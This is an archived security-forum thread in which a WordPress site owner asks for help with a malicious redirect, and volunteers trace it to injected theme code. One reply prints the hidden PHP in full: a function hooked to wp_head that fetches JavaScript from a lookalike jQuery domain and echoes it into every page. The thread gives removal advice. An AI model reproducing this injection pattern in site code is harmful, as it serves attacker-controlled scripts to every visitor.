Author Topic: [Solved]  (Read 5878 times)

Offline geryeo

  • Newbie
  • *
  • Posts: 3
    • Personal Message (Offline)
[Solved]
« on: August 23, 2012, 09:42:10 PM »
Hello,
i just started a new website few weeks ago, use wordpress + goodnews 3.4 theme. But yesterday when i clicked on a post "something" redirected me to this strange website: downloadmusicfreenow.com.
I cant figure out what can be infected... Please help me fix this.


Thank you!
« Last Edit: August 29, 2012, 09:32:03 AM by geryeo »

Offline !Donovan

  • LÖVE Scripting Website Analyst
  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 2138
  • Gender: Male
  • f(x)=2x+1
    • The WAR Against Malware
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #1 on: August 23, 2012, 10:24:01 PM »
Hi geryeo,

Can you provide the specific post you were on? Use hXtp:// instead of http://.

~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."
Useful Links: Sucuri SiteCheck | WAR | urlQuery | URLVoid | Wepawet

Offline polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20121
  • Gender: Male
  • malware fighter
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #2 on: August 23, 2012, 11:03:08 PM »
Hi geryeo,

Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts   site is given as a malvertiser, so that is likely what will be turned up...
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
Therev could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
     status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
     info: [img] s.gravatar.com/js/
     info: [decodingLevel=0] found JavaScript
     suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline

polonus
« Last Edit: August 23, 2012, 11:37:30 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline geryeo

  • Newbie
  • *
  • Posts: 3
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #3 on: August 24, 2012, 08:38:47 AM »
@Donovan  Sorry, I don't remember that post...

But I found in the theme folder .../post.php this part of code which looks very strange: ... jquerye.com/jquery-1.6.3.min.js ...
Shouldn't there be jquery.com?

Is there any good malware scanner site where i can upload the theme (think there is the problem) and check it?

Thanks
« Last Edit: August 24, 2012, 09:19:38 AM by geryeo »

Offline polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20121
  • Gender: Male
  • malware fighter
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #4 on: August 24, 2012, 11:38:55 AM »
Yes gereyo, that is malcode. !Donovan reported a similar case in another thread...jqueries was used there (plural), apparently they are variations on the same injected malcode theme,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline geryeo

  • Newbie
  • *
  • Posts: 3
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #5 on: August 24, 2012, 11:46:44 AM »
Ok, so now i just need to delete that part with ...jquerye.com/jquery-1.6.3.min.js... to solve it?

Thanks polonus

Offline polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20121
  • Gender: Male
  • malware fighter
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #6 on: August 24, 2012, 11:57:11 AM »
Hi geryeo,

You are welcome. Here what Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
blog article author = dre armeda

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline RamyNasr

  • Newbie
  • *
  • Posts: 1
    • Personal Message (Offline)
Re: [Solved]
« Reply #7 on: October 11, 2012, 02:24:04 AM »
Just to leave this as a reference for all who have similar problem:

The code that I had in my wordpress website was inside the theme folder in a file called functions.init.php and it looked like that:

Code: [Select]
if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider ()
    {
        if (function_exists('curl_init')) {
            $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
add_action('wp_head', 'insert_jquery_slider');
}

If you ever happened to be in the same place, this is how to solve this:

Just search in all your files by text and look for “jquerye” or even better for “insert_jquery_slider” or any of the patters you see in the piece of code above. That should point you where you need! (hint: just remove the whole function)

Offline polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20121
  • Gender: Male
  • malware fighter
    • Personal Message (Offline)
Re: [Solved]
« Reply #8 on: October 11, 2012, 08:31:32 AM »
Hi RamyNasr,

We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline icejay2000

  • Newbie
  • *
  • Posts: 1
    • Personal Message (Offline)
Re: [Solved]
« Reply #9 on: April 28, 2013, 10:12:40 PM »
Hi, I don't know if I'm a little late to post in here regarding this issue. I am having the same problem. I am trying to edit 

 <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init();   $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

I just don't know what part to take out exactly.  When mentioned one person said to remove the function, I just need to know exactly what part of the code is the function, as I am totally new to this stuff....I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.

Offline !Donovan

  • LÖVE Scripting Website Analyst
  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 2138
  • Gender: Male
  • f(x)=2x+1
    • The WAR Against Malware
    • Personal Message (Offline)
Re: [Solved]
« Reply #10 on: April 28, 2013, 10:47:48 PM »
Everything that you posted is part of the function. Did you try removing the whole line?

Also: The code you provide says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?

~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."
Useful Links: Sucuri SiteCheck | WAR | urlQuery | URLVoid | Wepawet

 

Google Chrome

AVAST recommends using the FREE Google Chrome™ browser.

Download Google Chrome Now